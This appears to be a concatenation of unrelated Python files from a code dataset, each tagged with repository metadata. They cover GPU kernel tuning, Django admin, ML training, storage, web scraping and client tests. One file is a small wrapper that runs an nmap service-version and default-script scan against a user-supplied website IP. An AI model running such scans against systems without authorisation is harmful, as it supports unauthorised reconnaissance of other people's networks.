s, arg_bufs = tvm_matmul_tune_op(batch, in_dim, out_dim)
func = tvm.build(s, arg_bufs, 'cuda', name='matmul')
ctx = tvm.context('cuda', 0)
a_np = np.random.uniform(size=(batch, in_dim)).astype("float32")
b_np = np.random.uniform(size=(in_dim, out_dim)).astype("float32")
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(b_np, ctx)
c = tvm.nd.array(np.zeros((batch, out_dim), dtype='float32'), ctx)
print(func.imported_modules[0].get_source()) # print kernel code
func(a, b, c)
num_flops = 2 * batch * in_dim * out_dim
num_runs = 10
timer_f = func.time_evaluator(func.entry_name, ctx, number=num_runs)
t = timer_f(a, b, c).mean
GFLOPS = num_flops / (t * 1e3) / 1e6
print("average time cost of %d runs = %g ms, %g GFLOPS." %
(num_runs, t * 1e3, GFLOPS))
def lookup_matmul_config(batch, in_dim, out_dim, output_log):
op_name = "tuned_dot_op_float_%d_%d_%d" % (batch, in_dim, out_dim)
log_name = FLAGS.autotvm_log
with open(log_name, "r") as fin:
log_lines = fin.readlines()
# log_records=tvm.autotvm.record.load_from_file(log_name)
log_records_all = []
log_records = []
for line in log_lines:
line = line.rstrip('\n')
# print(line)
record_json = json.loads(line)
tm = record_json['r'][0][0]
if tm > 10000000: # filter bad configs
continue
if record_json['i'][2][0] != batch or record_json['i'][2][1] != in_dim or record_json['i'][2][2] != out_dim: # filter other configs
continue
griddim_x = record_json['i'][5]["e"][2][2][0]
if griddim_x == -1:
griddim_x = int(out_dim / record_json['i'][5]["e"][2][2][1] / record_json['i'][5]["e"][2][2][2] / record_json['i'][5]["e"][2][2][3])
griddim_y = record_json['i'][5]["e"][1][2][0]
if griddim_y == -1:
griddim_y = int(batch / record_json['i'][5]["e"][1][2][1] / record_json['i'][5]["e"][1][2][2] / record_json['i'][5]["e"][1][2][3])
record = {"time": tm,
"grid": [griddim_x, griddim_y, 1],
"block": [record_json['i'][5]["e"][2][2][2], record_json['i'][5]["e"][1][2][2], 1],
"config": line}
log_records_all.append((tm, record))
# if record["block"][0] * record["block"][1] * record["block"][2] % 32 != 0:
# continue
# if record["grid"][0] * record["grid"][1] * record["grid"][2] < 16:
# continue
opt = tm * record["grid"][0] * record["grid"][1] * record["grid"][2] * record["block"][0] * record["block"][1] * record["block"][2]
if record["block"][0] * record["block"][1] * record["block"][2] % 32 != 0:
opt = tm * record["grid"][0] * record["grid"][1] * record["grid"][2] * (record["block"][0] * record["block"][1] * record["block"][2] / 32 + 1) * 32
record.update({"opt": opt})
log_records.append((tm, record))
# print(log_records[-1])
log_records_all.sort(key=lambda item: item[0])
log_records.sort(key=lambda item: item[0])
print(op_name)
log_records_fast = log_records[0:100]
# log_records_fast = log_records
log_records = []
for i in range(len(log_records_fast)):
log_records.append((log_records_fast[i][1]["opt"], log_records_fast[i][1]))
log_records.sort(key=lambda item: item[0])
print("fastest kernel:", log_records_all[0][1]["time"], "grid:", log_records_all[0][1]["grid"], "block:", log_records_all[0][1]["block"])
# print(log_records_fast[0][1]["config"])
print("efficient kernel:",log_records[0][1]["time"], "grid:", log_records[0][1]["grid"], "block:", log_records[0][1]["block"])
with open(output_log, 'a') as fout:
fout.write(log_records[0][1]["config"] + "\n")
def launch_matmul_from_config(config_json_path):
with open(config_json_path, "r") as fin:
config = json.load(fin)
batch = config["i"][2][0]
in_dim = config["i"][2][1]
out_dim = config["i"][2][2]
# print(batch, in_dim, out_dim)
task = autotvm.task.create(
tvm_matmul_tune_op, args=(batch, in_dim, out_dim), target='cuda')
# dispatch_context = autotvm.task.ApplyConfig(config)
dispatch_context = autotvm.apply_history_best(config_json_path)
best_config = dispatch_context.query(task.target, task.workload)
print("Using pretuned config:")
print(best_config)
with dispatch_context:
with tvm.target.create('cuda'):
s, arg_bufs = tvm_matmul_tune_op(batch, in_dim, out_dim)
func = tvm.build(s, arg_bufs, 'cuda', name='matmul')
ctx = tvm.context('cuda', 0)
a_np = np.random.uniform(size=(batch, in_dim)).astype("float32")
b_np = np.random.uniform(size=(in_dim, out_dim)).astype("float32")
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(b_np, ctx)
c = tvm.nd.array(np.zeros((batch, out_dim), dtype='float32'), ctx)
print(func.imported_modules[0].get_source()) # print kernel code
func(a, b, c)
num_flops = 2 * batch * in_dim * out_dim
num_runs = 10
timer_f = func.time_evaluator(func.entry_name, ctx, number=num_runs)
t = timer_f(a, b, c).mean
GFLOPS = num_flops / (t * 1e3) / 1e6
print("average time cost of %d runs = %g ms, %g GFLOPS." %
(num_runs, t * 1e3, GFLOPS))
output_log_file = "matmul_nn_autotvm_select_result.log"
if os.path.exists(output_log_file):
os.remove(output_log_file)
lookup_matmul_config(4, 256, 256, output_log_file)
lookup_matmul_config(16, 256, 256, output_log_file)
def tune_dot_codegen(m, k, n, log_path):
logging.getLogger('autotvm').setLevel(logging.DEBUG)
logging.getLogger('autotvm').addHandler(logging.StreamHandler(sys.stdout))
task = autotvm.task.create(tvm_matmul_tune_op, args=(m, k, n), target='cuda')
op_name = "tuned_dot_nn_op_float_m%d_k%d_n%d" % (m, k, n)
# log_name = "tuned_dot_op_float_%d_%d_%d" % (m, k, n)
# log_name = "tuned_kernels/" + log_name + ".log"
log_name = log_path
dispatch_context = autotvm.apply_history_best(log_name)
best_config = dispatch_context.query(task.target, task.workload)
with dispatch_context:
with tvm.target.create('cuda'):
s, arg_bufs = tvm_matmul_tune_op(m,k,n)
func = tvm.build(s, arg_bufs, 'cuda', name=op_name)
ctx = tvm.context('cuda', 0)
a_np = np.random.uniform(size=[m,k]).astype("float32")
w_np = np.random.uniform(size=[k,n]).astype("float32")
c_np = np.zeros([m,n]).astype("float32")
a = tvm.nd.array(a_np, ctx)
w = tvm.nd.array(w_np, ctx)
c = tvm.nd.array(c_np, ctx)
kernel_code = func.imported_modules[0].get_source()
func(a, w, c)
return kernel_code
def extract_ops_from_log():
dot_ops = []
dot_ops.append({'arg0_shape': [4, 256], 'arg1_shape': [256, 256], 'out_shape': [4, 256], 'transpose_A': False, 'transpose_B': False})
dot_ops.append({'arg0_shape': [16, 256], 'arg1_shape': [256, 256], 'out_shape': [16, 256], 'transpose_A': False, 'transpose_B': False})
return dot_ops
def get_tvm_topi_func_name(m, k, n):
func_name = "tuned_dot_nn_op_float_m%d_k%d_n%d_kernel0" % (m, k, n)
return func_name
def extract_tvm_profiling_from_log(log_path):
lines = open(log_path).readlines()
deduped_lines = list(set(lines))
# print(deduped_lines)
# print("#convs:", len(lines), "#deduped_convs:", len(deduped_lines))
profiling_result = {}
for line in deduped_lines:
items = line.rstrip('\n').split('|')
profiling_data = {
'gridDim': [int(items[1]), int(items[2]), int(items[3])],
'blockDim': [int(items[4]), int(items[5]), int(items[6])]
}
profiling_result.update({items[0]: profiling_data})
return profiling_result
def generate_db_topi_ops(dot_ops, log_path):
topi_ops = []
tvm_profiling_log_path = FLAGS.tvm_profile_log
if os.path.exists(tvm_profiling_log_path):
os.remove(tvm_profiling_log_path)
for dot_op in dot_ops:
m = dot_op['arg0_shape'][0]
k = dot_op['arg0_shape'][1]
n = dot_op['arg1_shape'][1]
topi_code = tune_dot_codegen(m, k, n, log_path)
topi_op = {
'tvm_func_name': get_tvm_topi_func_name(m, k, n),
'op_type': 'Dot',
'parameters': dot_op,
'code': topi_code
}
topi_ops.append(topi_op)
profiling_result = extract_tvm_profiling_from_log(tvm_profiling_log_path)
for topi_op in topi_ops:
tvm_func_name = topi_op['tvm_func_name']
topi_op.update(profiling_result[tvm_func_name])
return topi_ops
dot_ops = extract_ops_from_log()
topi_ops = generate_db_topi_ops(dot_ops, output_log_file)
with open(FLAGS.output_path, 'w') as fout:
json.dump(topi_ops, fout)
os.remove(output_log_file) | 2.703125 | 3 |
src/olympia/activity/admin.py | dante381/addons-server | 0 | 10815 | <filename>src/olympia/activity/admin.py<gh_stars>0
from django.contrib import admin
from .models import ActivityLog, ReviewActionReasonLog
from olympia.reviewers.models import ReviewActionReason
class ActivityLogAdmin(admin.ModelAdmin):
list_display = (
'created',
'user',
'__str__',
)
raw_id_fields = ('user',)
readonly_fields = (
'created',
'user',
'__str__',
)
date_hierarchy = 'created'
fields = (
'user',
'created',
'__str__',
)
raw_id_fields = ('user',)
view_on_site = False
def lookup_allowed(self, lookup, value):
if lookup == 'addonlog__addon':
return True
return super().lookup_allowed(lookup, value)
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
class ReviewActionReasonLogAdmin(admin.ModelAdmin):
date_hierarchy = 'created'
fields = (
'created',
'activity_log',
'activity_log__user__email',
'reason',
)
list_display = (
'created',
'activity_log',
'reason',
'activity_log__user__email',
)
list_filter = ('reason',)
list_select_related = ('activity_log__user',)
readonly_fields = (
'created',
'activity_log',
'activity_log__user__email',
)
search_fields = ('activity_log__user__email',)
view_on_site = False
def activity_log__user__email(self, obj):
return obj.activity_log.user.email
def has_add_permission(self, request):
return False
def get_form(self, request, obj=None, **kwargs):
form = super(ReviewActionReasonLogAdmin, self).get_form(request, obj, **kwargs)
form.base_fields['reason'].widget.can_add_related = False
form.base_fields['reason'].widget.can_change_related = False
form.base_fields['reason'].empty_label = None
form.base_fields['reason'].choices = [
(reason.id, reason.labelled_name())
for reason in ReviewActionReason.objects.all()
]
return form
admin.site.register(ActivityLog, ActivityLogAdmin)
admin.site.register(ReviewActionReasonLog, ReviewActionReasonLogAdmin)
| 1.929688 | 2 |
modules/nmap_script/address_info.py | naimkowshik/reyna-eye | 4 | 10816 | import subprocess
import sys
import time
import os
#############################
# COLORING YOUR SHELL #
#############################
R = "\033[1;31m" #
B = "\033[1;34m" #
Y = "\033[1;33m" #
G = "\033[1;32m" #
RS = "\033[0m" #
W = "\033[1;37m" #
#############################
os.system("clear")
print(" ")
print(R + "[" + G + "User Summary " + R + "]" + RS)
print("""
Shows extra information about IPv6 addresses, such as embedded MAC or IPv4 addresses when available.
Some IP address formats encode extra information; for example some IPv6 addresses encode an IPv4 address or MAC address
script can decode these address formats:
• IPv4-compatible IPv6 addresses,
• IPv4-mapped IPv6 addresses,
• Teredo IPv6 addresses,
• 6to4 IPv6 addresses,
• IPv6 addresses using an EUI-64 interface ID,
• IPv4-embedded IPv6 addresses,
• ISATAP Modified EUI-64 IPv6 addresses.
• IPv4-translated IPv6 addresses and
See RFC 4291 for general IPv6 addressing architecture and the definitions of some terms.
""")
print(" ")
webb = input("" + RS + "[" + B + "ENTER TARGET " + R + "WEBSITE " + Y + "IP" + RS + "]" + G + ": " + RS)
subprocess.check_call(['nmap', '-sV', '-sC', webb])
| 3.28125 | 3 |
tests/utilities/test_upgrade_checkpoint.py | cuent/pytorch-lightning | 0 | 10817 | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import os
import torch
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from pytorch_lightning.utilities.upgrade_checkpoint import upgrade_checkpoint
@pytest.mark.skip
@pytest.mark.parametrize(
"old_checkpoint, new_checkpoint",
[
(
{"epoch": 1, "global_step": 23, "checkpoint_callback_best": 0.34},
{"epoch": 1, "global_step": 23, "callbacks": {ModelCheckpoint: {"best_model_score": 0.34}}},
),
(
{"epoch": 1, "global_step": 23, "checkpoint_callback_best_model_score": 0.99},
{"epoch": 1, "global_step": 23, "callbacks": {ModelCheckpoint: {"best_model_score": 0.99}}},
),
(
{"epoch": 1, "global_step": 23, "checkpoint_callback_best_model_path": 'path'},
{"epoch": 1, "global_step": 23, "callbacks": {ModelCheckpoint: {"best_model_path": 'path'}}},
),
(
{"epoch": 1, "global_step": 23, "early_stop_callback_wait": 2, "early_stop_callback_patience": 4},
{"epoch": 1, "global_step": 23, "callbacks": {EarlyStopping: {"wait_count": 2, "patience": 4}}},
),
],
)
def test_upgrade_checkpoint(tmpdir, old_checkpoint, new_checkpoint):
filepath = os.path.join(tmpdir, "model.ckpt")
torch.save(old_checkpoint, filepath)
upgrade_checkpoint(filepath)
updated_checkpoint = torch.load(filepath)
assert updated_checkpoint == new_checkpoint
| 1.804688 | 2 |
rnn/train_rnn_oneflow.py | XinYangDong/models | 0 | 10818 | <reponame>XinYangDong/models<gh_stars>0
import oneflow.experimental as flow
from oneflow.experimental import optim
import oneflow.experimental.nn as nn
from utils.dataset import *
from utils.tensor_utils import *
from models.rnn_model import RNN
import argparse
import time
import math
import numpy as np
flow.env.init()
flow.enable_eager_execution()
def _parse_args():
parser = argparse.ArgumentParser("flags for compare oneflow and pytorch speed")
parser.add_argument(
"--seed", nargs="?", type=int, const=0, help="specify random seed"
)
return parser.parse_args()
def train(category_tensor, line_tensor, rnn, criterion, of_sgd):
hidden = rnn.initHidden()
for i in range(line_tensor.size()[0]):
output, hidden = rnn(line_tensor[i], hidden)
loss = criterion(output, category_tensor)
loss.backward()
of_sgd.step()
of_sgd.zero_grad()
return output, loss.numpy()[0]
# refer to: https://blog.csdn.net/Nin7a/article/details/107631078
def topk_(matrix, K, axis=1):
if axis == 0:
row_index = np.arange(matrix.shape[1 - axis])
topk_index = np.argpartition(-matrix, K, axis=axis)[0:K, :]
topk_data = matrix[topk_index, row_index]
topk_index_sort = np.argsort(-topk_data, axis=axis)
topk_data_sort = topk_data[topk_index_sort, row_index]
topk_index_sort = topk_index[0:K, :][topk_index_sort, row_index]
else:
column_index = np.arange(matrix.shape[1 - axis])[:, None]
topk_index = np.argpartition(-matrix, K, axis=axis)[:, 0:K]
topk_data = matrix[column_index, topk_index]
topk_index_sort = np.argsort(-topk_data, axis=axis)
topk_data_sort = topk_data[column_index, topk_index_sort]
topk_index_sort = topk_index[:, 0:K][column_index, topk_index_sort]
return topk_data_sort, topk_index_sort
def categoryFromOutput(output):
top_n, top_i = topk_(output.numpy(), 1)
category_i = top_i[0][0]
return all_categories[category_i], category_i
def timeSince(since):
now = time.time()
s = now - since
m = math.floor(s / 60)
s -= m * 60
return now, "%ds" % s
n_iters = 100000
print_every = 500
plot_every = 1000
learning_rate = (
0.005 # If you set this too high, it might explode. If too low, it might not learn
)
# decrease learning rate if loss goes to NaN, increase learnig rate if it learns too slow
def main(args):
random.seed(args.seed)
dataset_path = "./data/names"
n_categories = processDataset(dataset_path)
n_hidden = 128
rnn = RNN(n_letters, n_hidden, n_categories)
criterion = nn.NLLLoss()
rnn.to("cuda")
criterion.to("cuda")
of_sgd = optim.SGD(rnn.parameters(), lr=learning_rate)
# Keep track of losses for plotting
current_loss = 0
all_losses = []
start = time.time()
samples = 0.0
correct_guess = 0.0
for iter in range(1, n_iters + 1):
category, line, category_tensor, line_tensor = randomTrainingExample()
output, loss = train(category_tensor, line_tensor, rnn, criterion, of_sgd)
current_loss += loss
# Print iter number, loss, name and guess
if iter % print_every == 0:
start, time_str = timeSince(start)
guess, guess_i = categoryFromOutput(output)
correct = "✓" if guess == category else "✗ (%s)" % category
if correct == "✓":
correct_guess += 1
samples += 1
print(
"iter: %d / %f%%, time_for_every_%d_iter: %s, loss: %.4f, predict: %s / %s, correct? %s, acc: %f"
% (
iter,
float(iter) / n_iters * 100,
print_every,
time_str,
loss,
line,
guess,
correct,
correct_guess / samples,
)
)
# Add current loss avg to list of losses
if iter % plot_every == 0:
all_losses.append(current_loss / plot_every)
current_loss = 0
writer = open("all_losses.txt", "w")
for o in all_losses:
writer.write("%f\n" % o)
writer.close()
if __name__ == "__main__":
args = _parse_args()
main(args)
| 2.25 | 2 |
metaflow/datastore/local_storage.py | RobBlumberg/metaflow | 2 | 10819 | import json
import os
from ..metaflow_config import DATASTORE_LOCAL_DIR, DATASTORE_SYSROOT_LOCAL
from .datastore_storage import CloseAfterUse, DataStoreStorage
from .exceptions import DataException
class LocalStorage(DataStoreStorage):
TYPE = "local"
METADATA_DIR = "_meta"
@classmethod
def get_datastore_root_from_config(cls, echo, create_on_absent=True):
result = DATASTORE_SYSROOT_LOCAL
if result is None:
try:
# Python2
current_path = os.getcwdu()
except: # noqa E722
current_path = os.getcwd()
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
check_dir = os.path.realpath(check_dir)
orig_path = check_dir
top_level_reached = False
while not os.path.isdir(check_dir):
new_path = os.path.dirname(current_path)
if new_path == current_path:
top_level_reached = True
break # We are no longer making upward progress
current_path = new_path
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
if top_level_reached:
if create_on_absent:
# Could not find any directory to use so create a new one
echo(
"Creating local datastore in current directory (%s)" % orig_path
)
os.mkdir(orig_path)
result = orig_path
else:
return None
else:
result = check_dir
else:
result = os.path.join(result, DATASTORE_LOCAL_DIR)
return result
@staticmethod
def _makedirs(path):
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
return
else:
raise
def is_file(self, paths):
results = []
for path in paths:
full_path = self.full_uri(path)
results.append(os.path.isfile(full_path))
return results
def info_file(self, path):
file_exists = self.is_file([path])[0]
if file_exists:
full_meta_path = "%s_meta" % self.full_uri(path)
try:
with open(full_meta_path, "r") as f:
return True, json.load(f)
except OSError:
return True, None
return False, None
def size_file(self, path):
file_exists = self.is_file([path])[0]
if file_exists:
path = self.full_uri(path)
try:
return os.path.getsize(path)
except OSError:
return None
return None
def list_content(self, paths):
results = []
for path in paths:
if path == self.METADATA_DIR:
continue
full_path = self.full_uri(path)
try:
for f in os.listdir(full_path):
if f == self.METADATA_DIR:
continue
results.append(
self.list_content_result(
path=self.path_join(path, f),
is_file=self.is_file([self.path_join(path, f)])[0],
)
)
except FileNotFoundError as e:
pass
return results
def save_bytes(self, path_and_bytes_iter, overwrite=False, len_hint=0):
for path, obj in path_and_bytes_iter:
if isinstance(obj, tuple):
byte_obj, metadata = obj
else:
byte_obj, metadata = obj, None
full_path = self.full_uri(path)
if not overwrite and os.path.exists(full_path):
continue
LocalStorage._makedirs(os.path.dirname(full_path))
with open(full_path, mode="wb") as f:
f.write(byte_obj.read())
if metadata:
with open("%s_meta" % full_path, mode="w") as f:
json.dump(metadata, f)
def load_bytes(self, paths):
def iter_results():
for path in paths:
full_path = self.full_uri(path)
metadata = None
if os.path.exists(full_path):
if os.path.exists("%s_meta" % full_path):
with open("%s_meta" % full_path, mode="r") as f:
metadata = json.load(f)
yield path, full_path, metadata
else:
yield path, None, None
return CloseAfterUse(iter_results())
| 2.25 | 2 |
src/Models/tools/quality.py | rahlk/MOOSE | 0 | 10820 | <filename>src/Models/tools/quality.py
from __future__ import division, print_function
from scipy.spatial.distance import euclidean
from numpy import mean
from pdb import set_trace
class measure:
def __init__(self,model):
self.mdl = model
def convergence(self, obtained):
"""
Calculate the convergence metric with respect to ideal
solutions
"""
gammas=[]
ideals = self.mdl.get_pareto()
def nearest(a,lst):
# dist = euclidean(a, sorted(lst, key=lambda x:euclidean(x,a))[0])
# set_trace()
return euclidean(a, sorted(lst, key=lambda x:euclidean(x,a))[0])
gammas = [nearest(self.mdl.solve(member),ideals) for member in obtained]
return mean(gammas) | 2.890625 | 3 |
script/spider/www_chinapoesy_com.py | gitter-badger/poetry-1 | 1 | 10821 | <filename>script/spider/www_chinapoesy_com.py
'''
pip3 install BeautifulSoup4
pip3 install pypinyin
'''
import requests
import re
import os
import shutil
from bs4 import BeautifulSoup
from util import Profile, write_poem
def parse_poem_profile_td(td):
container = td.find('div')
if container is None:
container = td
title_a = container.find('a')
if title_a is None:
# maybe appears on the last page
return None
href = title_a.get('href')
title = title_a.get('title')
title = title.replace('\r\n', '').replace(
'————', '——').replace(',', ',').replace('(长诗节选)', '_长诗节选').strip()
title_a.extract()
# Wrong name 席慕蓉
author_text = container.text.replace('席慕蓉', '席慕容').strip()
author = re.findall(r'(.*)\((\d*?)\)', author_text, re.S)[0][0]
return Profile(href=href, title=title, author=author)
def read_poem_list(page):
'''
Read poem list
@param page:int
@return (poem_list:Profile[], has_next_page:Boolean)
'''
page_url = 'http://www.chinapoesy.com/XianDaiList_' + str(page) + '.html'
response = requests.get(page_url)
if response.status_code is not 200:
return ([], False)
text = response.text
soup = BeautifulSoup(text, features='lxml')
# profiles
main_table = soup.find('table', id='DDlTangPoesy')
td_ = main_table.find_all('td')
poet_list = []
for td in td_:
poem = parse_poem_profile_td(td)
if poem is not None:
poet_list.append(poem)
img_neg = soup.find('img', src='/Images/Pager/nextn.gif')
return (poet_list, img_neg is not None)
def read_poem(poem):
url = 'http://www.chinapoesy.com/' + poem.href
response = requests.get(url)
if response.status_code is not 200:
return None
soup = BeautifulSoup(response.text, features='lxml')
container = soup.find_all('div', class_='HeightBorderCenter')[-1]
return container.text.strip()
def main():
# delete the temp directory
has_next_page = True
page_num = 1
while has_next_page:
(current_list, has_next_page) = read_poem_list(page_num)
page_num = page_num + 1
for poem in current_list:
if(os.path.exists(poem.file_path())):
continue
content = read_poem(poem)
if not content:
print('Invalid content: ' + str(poem))
else:
write_poem(poem, content)
print('Page ' + str(page_num) + ' parsed')
main()
| 2.96875 | 3 |
design-patterns-101/Animal.py | stealthanthrax/python-design-patterns | 0 | 10822 | class Animal:
def __init__(self):
self.name = ""
self.weight = 0
self.sound = ""
def setName(self, name):
self.name = name
def getName(self):
return self.name
def setWeight(self, weight):
self.weight = weight
def getWeight(self):
return self.weight
def setSound(self, sound):
self.sound = sound
def getSound(self):
return self.sound
| 3.53125 | 4 |
tests/test_events.py | hhtong/dwave-cloud-client | 0 | 10823 | <reponame>hhtong/dwave-cloud-client
# Copyright 2020 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from dwave.cloud.client import Client
from dwave.cloud.solver import Solver
from dwave.cloud.events import add_handler
class TestEventDispatch(unittest.TestCase):
def setUp(self):
# mock client
self.client = Client(token='token', solver={'qpu': True})
self.client._fetch_solvers = lambda **kw: self.solvers
self.client._submit = lambda *pa, **kw: None
# mock solvers
self.solver = Solver(client=self.client, data={
"properties": {
"supported_problem_types": ["qubo", "ising"],
"qubits": [0, 1, 2],
"couplers": [[0, 1], [0, 2], [1, 2]],
"num_qubits": 3,
"num_reads_range": [0, 100],
"parameters": {
"num_reads": "Number of samples to return.",
"postprocess": "either 'sampling' or 'optimization'"
},
"topology": {
"type": "chimera",
"shape": [16, 16, 4]
},
"category": "qpu",
"tags": ["lower_noise"]
},
"id": "solver1",
"description": "A test solver 1",
"status": "online"
})
self.solvers = [self.solver]
def test_validation(self):
"""Event name and handler are validated."""
with self.assertRaises(ValueError):
add_handler('invalid_event_name', lambda: None)
with self.assertRaises(TypeError):
add_handler('before_client_init', None)
def test_client_init(self):
"""Before/After client init events are dispatched with correct signatures."""
# setup event handlers
memo = {}
def handler(event, **data):
memo[event] = data
add_handler('before_client_init', handler)
add_handler('after_client_init', handler)
# client init
client = Client(token='token', unknown='unknown')
# test entry values
before = memo['before_client_init']
self.assertEqual(before['obj'], client)
self.assertEqual(before['args']['endpoint'], None)
self.assertEqual(before['args']['token'], 'token')
self.assertEqual(before['args']['kwargs']['unknown'], 'unknown')
# test exit values
after = memo['after_client_init']
self.assertEqual(after['obj'], client)
self.assertEqual(after['args']['token'], 'token')
self.assertEqual(after['args']['kwargs']['unknown'], 'unknown')
self.assertEqual(after['return_value'], None)
def test_get_solvers(self):
"""Before/After get_solvers events are dispatched with correct signatures."""
# setup event handlers
memo = {}
def handler(event, **data):
memo[event] = data
add_handler('before_get_solvers', handler)
add_handler('after_get_solvers', handler)
# get solver(s)
self.client.get_solver()
# test entry values
before = memo['before_get_solvers']
self.assertEqual(before['obj'], self.client)
self.assertIn('refresh', before['args'])
self.assertIn('filters', before['args'])
self.assertIn('qpu', before['args']['filters'])
# test exit values
after = memo['after_get_solvers']
self.assertEqual(after['obj'], self.client)
self.assertIn('qpu', after['args']['filters'])
self.assertEqual(after['return_value'], self.solvers)
def test_sample(self):
"""Before/After solver sample events are dispatched with correct signatures."""
# setup event handlers
memo = {}
def handler(event, **data):
memo[event] = data
add_handler('before_sample', handler)
add_handler('after_sample', handler)
# sample
lin = {0: 1}
quad = {(0, 1): 1}
params = dict(num_reads=100)
future = self.solver.sample_ising(lin, quad, **params)
# test entry values
before = memo['before_sample']
args = dict(type_='ising', linear=lin, quadratic=quad, params=params)
self.assertEqual(before['obj'], self.solver)
self.assertDictEqual(before['args'], args)
# test exit values
after = memo['after_sample']
self.assertEqual(after['obj'], self.solver)
self.assertDictEqual(after['args'], args)
self.assertEqual(after['return_value'], future)
| 1.84375 | 2 |
ex3_nn_TF2.py | Melykuti/Ng_Machine_learning_exercises | 3 | 10824 | <reponame>Melykuti/Ng_Machine_learning_exercises<gh_stars>1-10
'''
Neural networks. Forward propagation in an already trained network in TensorFlow 2.0-2.1 (to use the network for classification).
TF 2.0:
Option 0 takes 0.08 sec.
Option 1 takes 0.08 sec.
Option 6 takes 0.08 sec.
Option 2 takes 4.7 sec.
Option 3 takes 1.6 sec.
Option 4 takes 5.2 sec.
Option 5 takes 0.08 sec.
Option 7 takes 0.06 sec.
If pred_digit = tf.map_fn(lambda x: ...) is used, then it's much slower:
Option 0 takes 1.75 sec.
Option 1 takes 1.75 sec.
Option 6 takes 1.8 sec.
Option 2 takes 6.1 sec.
Option 3 takes 3.1 sec.
Option 4 takes 6.3 sec.
Option 5 takes 1.8 sec.
Option 7 takes 1.8 sec.
TF 2.1: option==2, 3, 4, 5, 7 work; options 0, 1 and 6 fail with "AttributeError: 'RepeatedCompositeFieldContainer' object has no attribute 'append'" (But mine hasn't installed properly.)
Option 2 takes 4.5 sec.
Option 3 takes 1.5 sec.
Option 4 takes 4.4 sec.
Option 5 takes 0.08 sec.
Option 7 takes 0.06 sec.
If pred_digit = tf.map_fn(lambda x: ...) is used, then it's much slower:
Option 2 takes 5.7-6.1 sec.
Option 3 takes 3.1 sec.
Option 4 takes 5.7-6 sec.
Option 5 takes 1.8 sec.
Option 7 takes 1.8 sec.
Be careful:
According to tf.keras.layers.Dense (https://www.tensorflow.org/api_docs/python/tf/keras/layers/Dense):
output = activation(dot(input, kernel) + bias)
The kernel matrix multiplies from right! (And the inputs are seen as a row vector.) This is why I have to transpose the loaded network parameters Theta1 and Theta2.
Earlier, according to r1.15 tf.layers.dense documentation (https://www.tensorflow.org/api_docs/python/tf/layers/dense):
outputs = activation(inputs*kernel + bias)
[In version for Tensorflow 1.x, there used to be two independent choices in program flow:
Option 1 is with tf.layers.Input()
Option 2 is without tf.layers.Input()
Option a processes single inputs (single images), takes 1.5 sec
Option b does batch processing of all images at once, takes 0.3 sec
]
<NAME>
09-19/03/2018, 27/01-07/02, 28/02/2020
'''
import numpy as np
import scipy.io # to open Matlab's .mat files
import tensorflow as tf
from tensorflow import keras
import matplotlib.pyplot as plt
import time
### User input ###
option = 7 # {0, 1, ..., 7}
### End of input ###
# The network parameters are here for info, they are not actually used.
input_layer_size = 400 # 20x20 Input Images of Digits
hidden_layer_size = 25 # 25 hidden units
num_labels = 10 # 10 labels, from 1 to 10
# (note that we have mapped "0" to label 10)
# =========== Part 1: Loading [and Visualizing] Data =============
data = scipy.io.loadmat('../machine-learning-ex3/ex3/ex3data1.mat')
X = data['X']
y = data['y']
y = y % 10 # Transforming 10 to 0, which is its original meaning.
# ================ Part 2: Loading Pameters ================
# In this part of the exercise, we load the pre-initialized
# neural network parameters.
params = scipy.io.loadmat('../machine-learning-ex3/ex3/ex3weights.mat')
Theta1 = params['Theta1'] # Theta1 has size 25 x 401
Theta2 = params['Theta2'] # Theta2 has size 10 x 26
tf.keras.backend.clear_session()
start_time = time.time()
# ================= Part 3: Implement Predict =================
# After training a neural network, we would like to use it to predict
# the labels. You will now implement the "predict" function to use the
# neural network to predict the labels of the training set. This lets
# you compute the training set accuracy.
# Difference between tf.data.Dataset.from_tensors and tf.data.Dataset.from_tensor_slices: https://www.tensorflow.org/api_docs/python/tf/data/Dataset#from_tensor_slices
# from_tensors reads all data at once; from_tensor_slices reads line by line, which is preferable for huge datasets
# With from_tensors, you'd also need to pull out each row from the tensor somehow.
# https://towardsdatascience.com/how-to-use-dataset-in-tensorflow-c758ef9e4428
# https://www.tensorflow.org/programmers_guide/datasets#consuming_numpy_arrays
# To narrow computation to a subset of data for quick testing:
#X, y = X[1990:2010,:], y[1990:2010,:]
if option==2 or option==3:
dataset = tf.data.Dataset.from_tensor_slices(X)
else:
dataset = tf.data.Dataset.from_tensor_slices(X).batch(X.shape[0])
#dataset = tf.data.Dataset.from_tensor_slices(X).batch(64) # this is about the same speed as .batch(X.shape[0])
#dataset = tf.data.Dataset.from_tensor_slices(X).batch(1) # this also works but it is 1.5x-4x slower
# It also works with tf.keras.initializers.Constant() in place of tf.constant_initializer because these are only aliases: https://www.tensorflow.org/api_docs/python/tf/constant_initializer .
if option==0:
model = tf.keras.Sequential()
model.add(tf.keras.layers.Dense(Theta1.shape[0], activation='sigmoid', use_bias=True, kernel_initializer=tf.constant_initializer(Theta1[:,1:].T), bias_initializer=tf.constant_initializer(Theta1[:,0]), input_shape=[X.shape[1]]))
